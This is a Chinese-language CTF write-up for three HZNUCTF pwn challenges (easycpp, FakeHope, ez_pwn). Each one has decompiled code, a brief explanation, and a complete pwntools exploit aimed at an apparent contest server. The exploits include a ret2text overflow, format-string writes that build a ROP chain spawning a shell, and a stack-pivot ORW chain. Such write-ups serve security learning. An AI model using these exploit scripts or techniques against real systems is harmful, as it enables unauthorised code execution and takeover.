hznuctf

easycpp

std::ios_base::width 这段代码设置了输入长度为96，buf距离rbp的距离为 0x90，不过 strcmp(s1, s2); 这里cmp成功的话走到后边cpy就会有一个溢出，程序存在一个backdoor函数，ret2text

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v5; // rax
  __int64 v6; // rax
  __int64 v7; // rax
  __int64 v8; // rax
  __int64 v9; // rax
  __int64 v10; // rax
  __int64 v11; // rax
  __int64 v12; // rax
  __int64 v13; // rax
  __int64 v14; // rax
  __int64 v15; // rax
  __int64 v16; // rax
  __int64 v17; // rax
  char s2[96]; // [rsp+0h] [rbp-90h] BYREF
  char s1[44]; // [rsp+60h] [rbp-30h] BYREF
  unsigned int v21; // [rsp+8Ch] [rbp-4h]

  init();
  v3 = std::operator<<<char>(&std::cout, &str02[abi:cxx11]);
  std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
  v4 = std::operator<<<char>(&std::cout, &str03[abi:cxx11]);
  std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
  v5 = std::operator<<<char>(&std::cout, &str04[abi:cxx11]);
  std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
  v6 = std::operator<<<char>(&std::cout, &str05[abi:cxx11]);
  std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
  v7 = std::operator<<<char>(&std::cout, &str06[abi:cxx11]);
  std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
  v8 = std::operator<<<char>(&std::cout, &str07[abi:cxx11]);
  std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
  v9 = std::operator<<<char>(&std::cout, &str08[abi:cxx11]);
  std::ostream::operator<<(v9, &std::endl<char,std::char_traits<char>>);
  v10 = std::operator<<<char>(&std::cout, &str09[abi:cxx11]);
  std::ostream::operator<<(v10, &std::endl<char,std::char_traits<char>>);
  v11 = std::operator<<<char>(&std::cout, &str10[abi:cxx11]);
  std::ostream::operator<<(v11, &std::endl<char,std::char_traits<char>>);
  v12 = std::operator<<<char>(&std::cout, &str11[abi:cxx11]);
  std::ostream::operator<<(v12, &std::endl<char,std::char_traits<char>>);
  v13 = std::operator<<<char>(&std::cout, &str12[abi:cxx11]);
  v14 = std::ostream::operator<<(v13, &std::endl<char,std::char_traits<char>>);
  std::ostream::operator<<(v14, &std::endl<char,std::char_traits<char>>);
  v15 = std::operator<<<char>(&std::cout, &str01[abi:cxx11]);
  std::ostream::operator<<(v15, &std::endl<char,std::char_traits<char>>);
  v16 = std::operator<<<std::char_traits<char>>(&std::cout, "Tell me,which ctf is the best CTF?");
  std::ostream::operator<<(v16, &std::endl<char,std::char_traits<char>>);
  std::ios_base::width((std::ios_base *)&unk_404250, 96LL);
  std::operator>><char,std::char_traits<char>>(&std::cin, s2);
  v17 = std::operator<<<std::char_traits<char>>(&std::cout, s2);
  std::ostream::operator<<(v17, &std::endl<char,std::char_traits<char>>);
  strcpy(s1, "HZNUCTF,bestCTF!");
  v21 = strcmp(s1, s2);
  std::ostream::operator<<(&std::cout, v21);
  if ( v21 )
  {
    std::operator<<<std::char_traits<char>>(&std::cout, "Well, maybe you can try to believe HZNUCTF.");
  }
  else
  {
    memcpy(s1, s2, 0x60uLL);
    std::operator<<<std::char_traits<char>>(&std::cout, "You are right!");
    std::operator<<<std::char_traits<char>>(&std::cout, s1);
  }
  return 0;
}

exp:

from pwn import *
## from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "150.158.117.224"
PORT = 20023

elf = context.binary = ELF('./easycpp')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

backdoor = 0x4012FE

payload = b'HZNUCTF,bestCTF!'
payload = payload.ljust(0x18,b'\x00') + p64(backdoor) * 10
## g(p)
sla("Tell me,which ctf is the best CTF?",payload)


p.interactive()

FakeHope

保护全开，同时输入函数是 scanf %s 存在 00截断，可以找一个指向栈的双重指针，通过这个双重指针往栈上写一个地址，这样就实现任意地址读写了，通过双重指针去调整这个地址，就能实现写 四个字节 八个字节的长数据，发现是低版本的libc，csu会被编译到elf里面，本来想着在buf附近用格式化字符串写rop 用csu去调整rsp的位置，但是buf那边有几个操作会修改buf里的数据，不太好布置，然后就往返回地址那写rop, 因为程序不能正常返回，不过只需要劫持子函数的返回地址为leave ret 就能正常返回了

int __cdecl main(int argc, const char **argv, const char **envp)
{
  hope(argc, argv, envp);
  return 0;
}
unsigned __int64 hope()
{
  char format[264]; // [rsp+0h] [rbp-110h] BYREF
  unsigned __int64 v2; // [rsp+108h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  init();
  do
  {
    __isoc99_scanf(&unk_2004, format);
    printf(format);
    putchar(10);
  }
  while ( strcmp(format, "exit") );
  system("echo FakeHope");
  return __readfsqword(0x28u) ^ v2;
}

exp写的很烂,不过懒得改了(

exp:

from pwn import *
## from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "150.158.117.224"
PORT = 20022

elf = context.binary = ELF('./FakeHope')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

payload = b"%35$p-%43$p" 
sl(payload)

elf_base = int(r(14),16) - (0x64275a0c837d - 0x64275a0c7000)
success(f"elf_base ->{hex(elf_base)}")
ru('-')
libc_base = int(r(14),16) - (0x7234d1a20848 - 0x7234d1a00000)
success(f"libc_base ->{hex(libc_base)}")

rdi = elf_base + 0x0000000000001393
ret = elf_base + 0x000000000000101a
binsh = libc_base + 0x18ce57 + 0x8
system = libc_base + libc.sym['system'] + 0x8
leave_ret = elf_base + 0x000000000000130a


## 36:01b0│     0x7ffe1c3d3a38 —▸ 0x7ffe1c3d3aa8 —▸ 0x7ffe1c3d5583 ◂— 'SHELL=/bin/bash' 59
## 44:0220│     0x7ffe1c3d3aa8 —▸ 0x7ffe1c3d5583 ◂— 'SHELL=/bin/bash' 73

## 28:0148│     0x7ffc11eb7fe8 —▸ 0x7ffc11eb80b8 —▸ 0x7ffc11eb9557 ◂— '/home/lhj/Desktop/hznuctf/FakeHope/FakeHope' 45
## 42:0210│     0x7ffc11eb80b8 —▸ 0x7ffc11eb9557 ◂— '/home/lhj/Desktop/hznuctf/FakeHope/FakeHope' 71

payload = "%59$p"
sl(payload)
ru("0x")
leak = int(r(12),16) # 59 content
success(hex(leak))
return_addr = leak - (0x7ffd2282a748 - 0x7ffd2282a648)
printf_return_addr = return_addr - (0x7ffc11eb7fc8 - 0x7ffc11eb7ea8)
main = elf_base + 0x1296




payload = b"%" + str((printf_return_addr) & 0xffff).encode() + b'c%59$hn'
time.sleep(0.3)
sl(payload)



####### 在 return_addr 的位置 写一个 ret的gadget
############################################################################
payload = b"%" + str((return_addr) & 0xffff).encode() + b'c%45$hn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((ret) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 1) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((ret >> 8) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 2) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((ret >> 16) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 3) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((ret >> 24) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 4) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((ret >> 32) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 5) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((ret >> 40) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)
###########################################################################






######### 在 return_addr + 8 的位置 写一个 pop rdi ret的gadget
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 8) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((rdi) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 8 + 1) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((rdi >> 8) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 8 + 2) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((rdi >> 16) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 8 + 3) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((rdi >> 24) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 8 + 4) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((rdi >> 32) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 8 + 5) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((rdi >> 40) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)
####################################################################################################################


############################################ 在 return_addr + 16 的位置 写一个 binsh字符串的地址
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 16) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((binsh) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 16 + 1) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((binsh >> 8) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 16 + 2) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((binsh >> 16) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 16 + 3) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((binsh >> 24) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 16 + 4) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((binsh >> 32) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 16 + 5) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((binsh >> 40) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)


############################ 写system函数的地址
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 24) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((system) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 24 + 1) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((system >> 8) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 24 + 2) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((system >> 16) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 24 + 3) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((system >> 24) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 24 + 4) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((system >> 32) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((return_addr + 24 + 5) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%45$hhn'
time.sleep(0.3)
sl(payload)
payload = b"%" + str((main) & 0xff).encode() + b'c%73$hhn'
payload += b"%" + str(((system >> 40) & 0xff) + (0x100 - (main & 0xff))).encode() + b'c%71$hhn'
time.sleep(0.3)
sl(payload)

payload = b"%" + str((leave_ret) & 0xffff).encode() + b'c%73$hn'
## g(p)
sl(payload)


p.interactive()

ez_pwn

非栈上格式化字符串orw，要过一个随机数，read那可以把随机数种子覆盖掉，然后栈迁移打orw就好了，栈迁移后会把rbp弄没，open的时候传参依赖于rbp，所以open可能会失败

int __cdecl main(int argc, const char **argv, const char **envp)
{
  sand_box(argc, argv, envp);
  rand_time();
  vuln();
  return 0;
}

void rand_time()
{
  char buf[8]; // [rsp+0h] [rbp-10h] BYREF
  unsigned int seed; // [rsp+8h] [rbp-8h] BYREF
  int i; // [rsp+Ch] [rbp-4h]

  seed = time(0LL);
  printf("welcome to HZNUCTF !");
  printf("Please input your name: ");
  read(0, buf, 0x10uLL);
  printf("Hello, %s\n", buf);
  puts("I wonder if you're lucky enough");
  srand(seed);
  for ( i = 0; i <= 9; ++i )
  {
    printf("Let's guess the number: ");
    __isoc99_scanf("%d", &seed);
    if ( rand() != seed )
    {
      puts("Wrong.");
      puts("Guess you weren't lucky enough.");
      exit(-1);
    }
    puts("Right.");
  }
}

__int64 vuln()
{
  puts("WOW you really a lucky guy!");
  puts("Then I want to know if you are capable enough.");
  while ( 1 )
  {
    printf("Please tell us something: ");
    read(0, s1, 0x80uLL);
    if ( !strcmp(s1, "HZNUCTF") )
      break;
    printf(s1);
  }
  return 0LL;
}

exp:

from pwn import *
## from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "150.158.117.224"
PORT = 20042

elf = context.binary = ELF('./ez_pwn')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

cdll=ctypes.CDLL("./libc-2.31.so")


p = connect()

payload=b"a"*8+p32(0)+p32(0x20)
sa("Please input your name: ",payload)
cdll.srand(0)
for i in range(10):
    payload=cdll.rand()
    sla("Let's guess the number: ",str(payload))

payload=b"%6$p%7$p%9$p"+b"HZNUCTF\x00"
sa("Please tell us something: ",payload)

stack=int(p.recv(14).decode("utf-8"),16)
log.success(f"rbp->{hex(stack)}")
leek_main=int(p.recv(14).decode("utf-8"),16)
main=leek_main-38
log.success(f"main->{hex(main)}")
pie=main-0x14df
log.success(f"pie->{hex(pie)}")
libc_base=int(p.recv(14).decode("utf-8"),16)-libc.sym["__libc_start_main"]-243
log.success(f"libc_base->{hex(libc_base)}")
bss=pie+0x4060
leave_ret=pie+0x1369

payload=f"%{(stack&0xffff)-0x8}c%11$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)
payload=f"%{(leave_ret&0xffff)}c%39$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)
payload=f"%{(stack&0xffff)+0x28}c%11$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)
payload=f"%{(bss&0xffff)}c%39$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)
payload=f"%{(stack&0xffff)+0x30}c%11$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)
payload=f"%{(leave_ret&0xffff)}c%39$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)

payload=f"%{(stack&0xffff)-0x10}c%11$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)
payload=f"%{(stack&0xffff)+0x28}c%39$hnHZNUCTF\x00".encode()
sa("Please tell us something: ",payload)

open=libc_base+libc.sym["open"]
read=libc_base+libc.sym["read"]
write=libc_base+libc.sym["write"]
pop_rdi=pie+0x1573
pop_rsi=libc_base+0x2601f
pop_rdx=libc_base+0x15fae6
flag=bss+0xe0
buf=bss+0x100

payload=b"HZNUCTF\x00"
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss+0x48) + p64(pop_rdx) + p64(0x110) + p64(0)
payload += p64(read)
sa("Please tell us something: ",payload)

payload = p64(pop_rdi) + p64(flag) + p64(open)
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(buf) + p64(pop_rdx) + p64(0x30) + p64(0) + p64(read) 
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(buf) + p64(pop_rdx) + p64(0x30) + p64(0) + p64(write)+b"./flag\x00"
s(payload)

p.interactive()